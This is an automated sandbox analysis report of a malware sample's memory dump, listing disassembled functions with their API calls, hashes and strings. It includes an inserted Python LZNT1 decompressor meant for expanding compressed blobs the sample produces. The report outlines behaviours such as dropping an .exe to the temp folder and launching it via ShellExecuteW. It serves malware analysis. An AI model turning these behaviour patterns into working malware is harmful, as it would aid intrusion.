                                                                                    • Opcode ID: eea494397096154e4e0cb39ec876857ae157f5d1332288563a301067daded4f1
                                                                                    • Instruction ID: ccdb73fda4312d6a95a11584415e353fe762c6bc3f4ee251b05828f0374c47d1
                                                                                    • Opcode Fuzzy Hash: eea494397096154e4e0cb39ec876857ae157f5d1332288563a301067daded4f1
                                                                                    • Instruction Fuzzy Hash: 98F03931000601EFEB222F61EC09A46BFF2FF44312B10582DEAEB46524DB35B8A5EF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 04ECA8C0
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECA8D9
                                                                                    • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 04ECA8E3
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000001), ref: 04ECA8F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 4201418100-0
                                                                                    • Opcode ID: ca5c7e0bf49473d9fe87f725e6ae81f05259261f0639eb6c6ebe845ab7d198b8
                                                                                    • Instruction ID: 7b3c8423b2383e9729628d46dc6f44e17796ec020f09bd956efe786ad52b54a3
                                                                                    • Opcode Fuzzy Hash: ca5c7e0bf49473d9fe87f725e6ae81f05259261f0639eb6c6ebe845ab7d198b8
                                                                                    • Instruction Fuzzy Hash: 02D0A932388300ABE3001BB29D8EB983620E794B03F801634F703D88C8CEA928439B16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04EDD7C7
                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04EDD7CC
                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04EDD7D1
                                                                                      • Part of subcall function 04EDE361: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 04EDE372
                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04EDD7E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                    • String ID:
                                                                                    • API String ID: 1761009282-0
                                                                                    • Opcode ID: 4b34d1eb559c58132cd85e065138e547ebf45c6fd312b7828b6112a98e728dee
                                                                                    • Instruction ID: 628986907778f7b07255783bb3d8e9625d8deafb09a469319fdab21e6f2db11f
                                                                                    • Opcode Fuzzy Hash: 4b34d1eb559c58132cd85e065138e547ebf45c6fd312b7828b6112a98e728dee
                                                                                    • Instruction Fuzzy Hash: 56C04818000F02957E203FB96A2DABE03402F5218DB89B8C5C8A91F9429A06300B2873
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EE97B5
                                                                                      • Part of subcall function 04EDEB43: IsProcessorFeaturePresent.KERNEL32(00000017,04EDEB15,00000000,00000001,00000004,00000000,00000001,00000001,?,?,04EDEB22,00000000,00000000,00000000,00000000,00000000), ref: 04EDEB45
                                                                                      • Part of subcall function 04EDEB43: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 04EDEB67
                                                                                      • Part of subcall function 04EDEB43: TerminateProcess.KERNEL32(00000000), ref: 04EDEB6E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 2667617558-3972193922
                                                                                    • Opcode ID: 2be3bc7b6416036c845c84843d5f87116fbda7866d4dcdc9c4ced2ae4b89c846
                                                                                    • Instruction ID: a466e7479916260f54227fb45d608ee8346ddf4bac3c7923ded1102799be4328
                                                                                    • Opcode Fuzzy Hash: 2be3bc7b6416036c845c84843d5f87116fbda7866d4dcdc9c4ced2ae4b89c846
                                                                                    • Instruction Fuzzy Hash: 7B5194B5E0020ADFDF14DFAAC880ABDBBF5EF48318F24516AD854E7341E675AA058B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(04EF6FD0,00000000,00000001,04EF7070,00000004,0000002C,000002E8,00000000), ref: 04EB2DFC
                                                                                    • SysFreeString.OLEAUT32(?), ref: 04EB2EE2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFreeInstanceString
                                                                                    • String ID: FriendlyName
                                                                                    • API String ID: 586785272-3623505368
                                                                                    • Opcode ID: 3500dab3fc1c119b80acad08d2e36ed54ec2933bff4f70ccb0c2f2ef1b5dfa17
                                                                                    • Instruction ID: 1214b34669aaa9fd2f858885682080df05139d7653dfbac423de818c4859f9c1
                                                                                    • Opcode Fuzzy Hash: 3500dab3fc1c119b80acad08d2e36ed54ec2933bff4f70ccb0c2f2ef1b5dfa17
                                                                                    • Instruction Fuzzy Hash: 80511C71A002099FDB14DFA5CC98FEFB7B5EF48704F1495A8E945AB250D775A801CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(Function_00046FD0,00000000,00000001,04EF7070,00000000,?,?,?,?,?,?,04EB295F,?,?), ref: 04EB2F9A
                                                                                    • SysFreeString.OLEAUT32(04EB295F), ref: 04EB3040
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFreeInstanceString
                                                                                    • String ID: FriendlyName
                                                                                    • API String ID: 586785272-3623505368
                                                                                    • Opcode ID: 67566cba2df85150eb2ef6099982a4d1e46a8acabbf39a1dccd9b14ea3037f2c
                                                                                    • Instruction ID: 4d092de97357517b8d745706f7bf398fab0dda5ad3c659bfd5b5ee3f3dbc8516
                                                                                    • Opcode Fuzzy Hash: 67566cba2df85150eb2ef6099982a4d1e46a8acabbf39a1dccd9b14ea3037f2c
                                                                                    • Instruction Fuzzy Hash: FA411C74700209AFDB14CFA5CC89FAAB7B9BF88748F1495A8F945DB280D771E941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EC7809
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    • Opcode ID: f90950447c47e07d0091a3a7176cddca7e54a68dbc2e1644414f75f7434391a4
                                                                                    • Instruction ID: 14c776e27e754bdc589cf29925fbe2215d2fab9249c2f5d67c55b2a6f2ddda8f
                                                                                    • Opcode Fuzzy Hash: f90950447c47e07d0091a3a7176cddca7e54a68dbc2e1644414f75f7434391a4
                                                                                    • Instruction Fuzzy Hash: 1D31F8323403198FD3249F6CE940A56F7E9EF94716B20192FE555CB641D771B841CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 04ED4EB9
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED4EE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement
                                                                                    • String ID: paw
                                                                                    • API String ID: 2172605799-712274330
                                                                                    • Opcode ID: 4b54e4460e1f9ea753e524ce62867c6f65738aa524830bfc01bf95be472bfd3a
                                                                                    • Instruction ID: 113dacc1459d156331baacbe2143a75e39654261f421fe66549070500ef84396
                                                                                    • Opcode Fuzzy Hash: 4b54e4460e1f9ea753e524ce62867c6f65738aa524830bfc01bf95be472bfd3a
                                                                                    • Instruction Fuzzy Hash: 6541B071A0062AABDB25DFA8C5806A9B7A0FF58314F546269DD55AB2C0E730FD12CBC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED48BD
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED48C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: vector<T> too long
                                                                                    • API String ID: 909987262-3788999226
                                                                                    • Opcode ID: 32f256fa6fe89637a07f986ee80c87ee4ca206d5d937f6679e8bd3fd665ec823
                                                                                    • Instruction ID: 1f49d734e4ce6ce137d694bfe29da20455f0d32a5cbc0be33c77cbb5eebfa675
                                                                                    • Opcode Fuzzy Hash: 32f256fa6fe89637a07f986ee80c87ee4ca206d5d937f6679e8bd3fd665ec823
                                                                                    • Instruction Fuzzy Hash: B9318F357006468FCB2C8F7DCDE542AB7D2FB942A4328DA3DE59ACB684D671F8428644
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • CreateEventW.KERNEL32(00000000,00000001), ref: 04EB9E41
                                                                                    • CloseHandle.KERNEL32(04EFD8B0,00000000,00000001,0000003F), ref: 04EB9E9B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                    • String ID: C
                                                                                    • API String ID: 1850149996-1037565863
                                                                                    • Opcode ID: ea73c928f3f8ea54b73d228bda81c5e9676d4b23ce5ff0171f806e34b89136ab
                                                                                    • Instruction ID: 48b53711d244342bfa2f8cce7de97d66e271c5e7dd5b146cea0b1d56882c1797
                                                                                    • Opcode Fuzzy Hash: ea73c928f3f8ea54b73d228bda81c5e9676d4b23ce5ff0171f806e34b89136ab
                                                                                    • Instruction Fuzzy Hash: 344145B01083419BE710DF64D859B5BBBE4BF80758F101A1CFAA18A290DB75E908CFD3
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • WaitForSingleObject.KERNEL32(?), ref: 04EB9915
                                                                                    • CloseHandle.KERNEL32(04EFC858), ref: 04EB9935
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseHandleLibraryLoadObjectSingleWait
                                                                                    • String ID: C
                                                                                    • API String ID: 2253563908-1037565863
                                                                                    • Opcode ID: 4d82c7ad3f3649f7d376d22af80c297d135ef1058f188b9f1353dd9878a1bccf
                                                                                    • Instruction ID: f355fc94e55e6d6082e824a03a715cd121679fcf04037c216c359dd9c58ab11a
                                                                                    • Opcode Fuzzy Hash: 4d82c7ad3f3649f7d376d22af80c297d135ef1058f188b9f1353dd9878a1bccf
                                                                                    • Instruction Fuzzy Hash: F74139B01083459BE710DF64D858B5BBBE4FF81358F10591CFAA18A2A1D775E848CF93
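The two entries above (the CreateEventW and WaitForSingleObject functions) share the subcall at 04EB7970, which resolves RtlGetCompressionWorkSpaceSize, RtlCompressBuffer and RtlDecompressBuffer from ntdll.dll at run time. When a blob produced by that code is dumped from memory or carved from traffic, an analyst needs to expand it offline. The decompressor below is an added example, not code from the sample or from Joe Sandbox; the report does not show which COMPRESSION_FORMAT_* value the sample passes, so this assumes LZNT1 (format 2), the usual choice with those calls. The sample input is hand-encoded for the example.

```python
"""LZNT1 decompressor (pure Python).

Added example, not code from the sample or from Joe Sandbox.  The function
listing shows RtlGetCompressionWorkSpaceSize / RtlCompressBuffer /
RtlDecompressBuffer being resolved from ntdll.dll; the format argument is
not visible in the report, so LZNT1 (COMPRESSION_FORMAT_LZNT1 = 2) is an
assumption.  This lets a dumped blob be expanded without calling ntdll.
"""
import struct


def _displacement(pos):
    """Bits moved from the length field to the offset field.

    LZNT1 starts a chunk with a 12-bit length / 4-bit offset split and moves
    one bit to the offset field each time the index of the last byte written
    (pos) doubles past 16.
    """
    disp = 0
    while pos >= 0x10:
        pos >>= 1
        disp += 1
    return disp


def _decompress_chunk(chunk):
    """Expand one compressed chunk body (the bytes after its 2-byte header)."""
    out = bytearray()
    i = 0
    while i < len(chunk):
        flags = chunk[i]          # one flag bit per following token, LSB first
        i += 1
        for bit in range(8):
            if i >= len(chunk):
                break
            if not (flags >> bit) & 1:
                out.append(chunk[i])   # literal byte
                i += 1
                continue
            if i + 2 > len(chunk):
                raise ValueError("truncated back-reference")
            token = struct.unpack_from("<H", chunk, i)[0]
            i += 2
            disp = _displacement(len(out) - 1)
            length = (token & (0xFFF >> disp)) + 3
            offset = (token >> (12 - disp)) + 1
            if offset > len(out):
                raise ValueError("back-reference points before chunk start")
            start = len(out) - offset
            # Byte-wise copy: the match may overlap the bytes being produced.
            for k in range(length):
                out.append(out[start + k])
    return bytes(out)


def lznt1_decompress(data):
    """Decompress an LZNT1 stream of the kind RtlCompressBuffer produces."""
    out = bytearray()
    i = 0
    while i + 2 <= len(data):
        header = struct.unpack_from("<H", data, i)[0]
        i += 2
        if header == 0:
            break                       # end-of-stream marker
        size = (header & 0x0FFF) + 1    # body length
        if (header >> 12) & 0x7 != 3:   # signature bits must be 011
            raise ValueError("bad chunk signature at offset %d" % (i - 2))
        chunk = data[i:i + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk at offset %d" % (i - 2))
        i += size
        if header & 0x8000:             # bit 15: chunk is compressed
            out += _decompress_chunk(chunk)
        else:
            out += chunk                # stored chunk, copied verbatim
    return bytes(out)


# Constructed input (hand-encoded for this example): two compressed chunks,
# the second long enough to exercise the widened offset field.
SAMPLE = (
    b"\x06\xB0"                        # chunk 1 header: compressed, 7 body bytes
    b"\x10" b"ABCD" b"\x05\x30"        # flags, 4 literals, match(offset 4, length 8)
    b"\x18\xB0"                        # chunk 2 header: compressed, 25 body bytes
    b"\x00" b"01234567"                # 8 literals
    b"\x00" b"89abcdef"                # 8 literals
    b"\x10" b"ghij" b"\x07\x98"        # 4 literals, match(offset 20, length 10)
)

if __name__ == "__main__":
    print(lznt1_decompress(SAMPLE))
```

Back-references never cross a chunk boundary, so each chunk is expanded against its own buffer; a stream that decodes to a PE or a readable config under this routine confirms the LZNT1 assumption, and a signature error on the first header is the quickest sign that the sample used a different format.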
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB5C4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    • Opcode ID: a27198a0dbeb80432640f9151740c11b8516eda69e5afb42310db9284bb69c7f
                                                                                    • Instruction ID: 51885a984b3eb879a03093766175b538e9659997e065620d5be4cc10fb206fb1
                                                                                    • Opcode Fuzzy Hash: a27198a0dbeb80432640f9151740c11b8516eda69e5afb42310db9284bb69c7f
                                                                                    • Instruction Fuzzy Hash: E0219271300209AF9724DF69D8D099AB3EAFF94718354593DE985CB210DB70F815CBE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04ED527C
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED52E4
                                                                                      • Part of subcall function 04ED665F: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04ED666B
                                                                                      • Part of subcall function 04ED665F: __CxxThrowException@8.LIBVCRUNTIME ref: 04ED6679
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompareException@8ExchangeInterlockedObjectSingleSwitchThreadThrowWaitXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                    • String ID: list<T> too long
                                                                                    • API String ID: 2768081694-4027344264
                                                                                    • Opcode ID: b55b41e70fff35da1279092429fc3d6de88ba4f80dbeb9eab7aea330d79bfcd7
                                                                                    • Instruction ID: dadc16cd8e28b3ce7b2d831452269102cc20bc53cecf6b83db8d54b1aa149cdc
                                                                                    • Opcode Fuzzy Hash: b55b41e70fff35da1279092429fc3d6de88ba4f80dbeb9eab7aea330d79bfcd7
                                                                                    • Instruction Fuzzy Hash: D3119471200605AFCB14DF69C880996F7F8FF48314B149629ED6ADB755DB30F846CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04EBE355
                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000001,00000000,00000001), ref: 04EBE3C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExecuteShellSleep
                                                                                    • String ID: open
                                                                                    • API String ID: 4194306370-2758837156
                                                                                    • Opcode ID: f33827e0c126d62ccc82154b06c3795ad2620a97c727ccc8c0c87b229a27214d
                                                                                    • Instruction ID: 495c695b433da9e26734dd9b278ecde0e24c08c29948920837bce7d753238d55
                                                                                    • Opcode Fuzzy Hash: f33827e0c126d62ccc82154b06c3795ad2620a97c727ccc8c0c87b229a27214d
                                                                                    • Instruction Fuzzy Hash: F911B4716003449FE7249F2DCC50BBA77E5AB88709F141869E5CA4B281E676F844CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 04EBE0CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: PathTemp
                                                                                    • String ID: .exe$\
                                                                                    • API String ID: 2920410445-2920562713
                                                                                    • Opcode ID: f7f53315ed06e04aa54450418e9ce45430df598f81fe1045ce1e5b1bb615f2b6
                                                                                    • Instruction ID: 49e64954d53fa3c34647dc202d7b2ede3738fd790fbe3b302f12ea6cb3e86cfb
                                                                                    • Opcode Fuzzy Hash: f7f53315ed06e04aa54450418e9ce45430df598f81fe1045ce1e5b1bb615f2b6
                                                                                    • Instruction Fuzzy Hash: 8F114872900209ABEB206F98CC45BEB7BB8EF41319F049179E9495F740E7B0BD0583E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC9624
                                                                                      • Part of subcall function 04EC0C20: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,04EC963F,?,?), ref: 04EC0C33
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Open$CloseQueryValuewsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 734024169-1865207932
                                                                                    • Opcode ID: c6800787b3d1222fce75918e4a1f6a552610a3a4c35b43b34c643ea6f385262f
                                                                                    • Instruction ID: df138f5e9d3d9e168e60b2a2a402b005a3cb9dc7840a8a6323be7657f74393b1
                                                                                    • Opcode Fuzzy Hash: c6800787b3d1222fce75918e4a1f6a552610a3a4c35b43b34c643ea6f385262f
                                                                                    • Instruction Fuzzy Hash: D401B8309081059BC324DFB89D508BDBFB9EF8520CF2002EEC4568F203E932AA0BC791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,04EBE839), ref: 04EBE67E
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,04EBE839), ref: 04EBE683
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                    • String ID: stop
                                                                                    • API String ID: 528846559-3109426870
                                                                                    • Opcode ID: eb1136f9f23268e9f09579156800e64b12609a75f5c97e6bfefc64422c4e1092
                                                                                    • Instruction ID: aa2602e592b25cbdd8181ee9c7f01a79b7bf4510b29cc96fb67491adc7a4a36d
                                                                                    • Opcode Fuzzy Hash: eb1136f9f23268e9f09579156800e64b12609a75f5c97e6bfefc64422c4e1092
                                                                                    • Instruction Fuzzy Hash: D5018136601202AFEB10DF19D884BD6B7A5FF48328F045614E89997A94C775FC90CBD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,04EBE258,00000000,04EBF095,00000000,00000000,?,?,00000001), ref: 04EBE55A
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBE563
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                    • String ID: stop
                                                                                    • API String ID: 528846559-3109426870
                                                                                    • Opcode ID: a544c5e998cf866f3cd254b72dd47d9f74c5c868df4e83d3a8013bde878d09ba
                                                                                    • Instruction ID: 68091ea15c2a93e61a053301585211dd297f122a3cbc9a7063b6b5ad64e2bd50
                                                                                    • Opcode Fuzzy Hash: a544c5e998cf866f3cd254b72dd47d9f74c5c868df4e83d3a8013bde878d09ba
                                                                                    • Instruction Fuzzy Hash: C4F01D705027008BE7209F69D848B937AE4BF48318F005A1CE5DAC6690EB75F8808B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32 ref: 04EC8898
                                                                                    • HeapAlloc.KERNEL32(03390000,00000000,?), ref: 04EC88A8
                                                                                    • GetProcessHeap.KERNEL32 ref: 04EC88FC
                                                                                    • HeapAlloc.KERNEL32(03390000,00000000,?), ref: 04EC890C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1617791916-0
                                                                                    • Opcode ID: 32ef3246600ae5dc6d1db08bfa9b01ffe47a8a0569be156b9e695a119a47df84
                                                                                    • Instruction ID: 231d99f971930a4c49f122460777a86ba3700e2dce01435603e142206a5f7014
                                                                                    • Opcode Fuzzy Hash: 32ef3246600ae5dc6d1db08bfa9b01ffe47a8a0569be156b9e695a119a47df84
                                                                                    • Instruction Fuzzy Hash: 09213A70A0021D8BDB20EF69DD44BDAB7B5FB88315F0051D9E809E7200E734AEA1CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                    • EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • LeaveCriticalSection.KERNEL32(-0000006C), ref: 04ED25BF
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED25C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    • Opcode ID: 0a6c8982c03dd6802053e8c65e895f2852d0ab1b9a343d9cd0e4e6ae2356efc8
                                                                                    • Instruction ID: 10a82aa71a4650d963b7bad015d2f980eb625cdd089ec57fcb51407e79412d95
                                                                                    • Opcode Fuzzy Hash: 0a6c8982c03dd6802053e8c65e895f2852d0ab1b9a343d9cd0e4e6ae2356efc8
                                                                                    • Instruction Fuzzy Hash: 88018C32401208BBDB11AF59DD84BEEBBB8FF84315F145059EE1423290C775BA56DAA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000054,00000000,00000000,?,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000), ref: 04ED1D3F
                                                                                    • SetLastError.KERNEL32(00000000,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D51
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D65
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3832147951-0
                                                                                    • Opcode ID: bf601b29d67e5f33c3ef84bad2682ee12d15c70f185f2529dfa690a89df2b986
                                                                                    • Instruction ID: f973905411621287d904480a05c81315efebdeedb86a231f90fc3c2f1eb170d2
                                                                                    • Opcode Fuzzy Hash: bf601b29d67e5f33c3ef84bad2682ee12d15c70f185f2529dfa690a89df2b986
                                                                                    • Instruction Fuzzy Hash: B9F09037301110ABD3005A9AE848BAAF76CEBC9267F044137FA06C3200CB359C05C6B0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
